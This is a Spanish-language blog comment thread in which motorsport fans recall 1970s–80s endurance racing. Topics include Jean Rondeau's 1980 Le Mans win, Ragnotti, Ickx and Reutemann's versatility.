    Muy buen relato. De la clasificación surge una muy buena carrera del De Cadenet Lola LM ( T 380?) y del Inaltera ambos con motores Ford Cosworth si mal no recuerdo.

    • Pablo Felipe Richetti 20/02/2016 @ 9:00 am

      Mario, también es notable el digno 4º puesto de Ragnotti. será “Jeannot”, quién si no? Al año siguiente, el del triunfo del rombo, también llegó 4º, si mal no recuerdo. Además , por esos años, brillaba en el campeonato mundial de rally. Piloti, che gente …; todavía quedan de esos?

      • Beppe Viola 20/02/2016 @ 10:58 am

        No… no quedan mas de esos… ahora todo están muy especializados…….Las presencias de Raikonen o Kubika en el rally o de Loew en pista no mostraron grandes resultados….
        Quizás Ickx (o “Pierino la peste” como lo llamaba Ferrari), capaz de ser veloz con cualquier cosa, fuè uno de los últimos junto con Andretti (Mario)…..

        • Güilbeis 20/02/2016 @ 11:15 am

          Lole también era muy veloz con cualquier cosa de cuatro ruedas

          • Pablo Felipe Richetti 20/02/2016 @ 12:07 pm

            Totalmente de acuerdo.

          • Beppe Viola 20/02/2016 @ 1:46 pm

            Claro que si…. el Lole también està entre los polivalentes….

        • Pablo Felipe Richetti 20/02/2016 @ 12:24 pm

          Pobres los navegantes de Robert, se viene dando cada bombazos, algún día aceptará su realidad o su pasión por la velocidad será más fuerte?

  4. mario 20/02/2016 @ 9:24 pm

    Rondeau llega a ganar Le Mans con un Rondeau..,, que me parece era el Inaltera …, con motor Ford Cosworth segundo Ickx con un Porsche, revisar año 1980, uno de los pocos pilotos que gana con un auto de su propia construcción. Pongo revisar porque estoy medio vago para el google o un libraco porque es sábado parafraseando al gran Vinicius.
    Pablo y Guilbeis, sin lugar a dudas Lole era rápido sobre cualquier auto incluso el 917.

    • Beppe Viola 21/02/2016 @ 7:19 am

      Jean Rondeau era un personaje de aquellos, que con pasión y poca guita logran coronar el sueño de una vida….
      como bien dice Mario, el Inaltera era nomas un Rondeau Cosworth (Inaltera era el sponsor)… Fuè además el unico en ganar Le Mans como piloto con un auto construido por el mismo en el ’80, con un final espeluznante, conducido con gomas slick en la última media ora de diluvio…… con otros pocos resultados y la aparición de los Grupo B, la aventura Rondeau terminó en el ’85 con la muerte del constructor……
      El Lole, mas que con el 917, (corrió una sola carrera con un 917 de segunda mano) fue muy veloz con las 312B y las 33/3TT…. ni hablar del Rally….

  5. Marcelo Beruto 24/02/2016 @ 4:57 pm

    Ragnotti es un crack.

  6. Jan Lammers 03/03/2016 @ 4:16 am

    Ickx es uno de los más grandes de Sport, aunque no le perdono lo de EauRouge en los 1000km de Spa cuando cierra la marcha de Stefan Bellof y fue el fin de una promesa, que iba como Senna o mejor.
    Lole ademas de ganar 12 GPs en las mejores marcas de F1 y F2, con Peugeot 205 t16 fue muy rápido en Argentina, en Fiat 131 también y en 1984 volvió a Nurburgring con el 190 2.3 16V andando delante de varios campeones de F1.

Tu email no será publicado. Required fields are marked *

*


*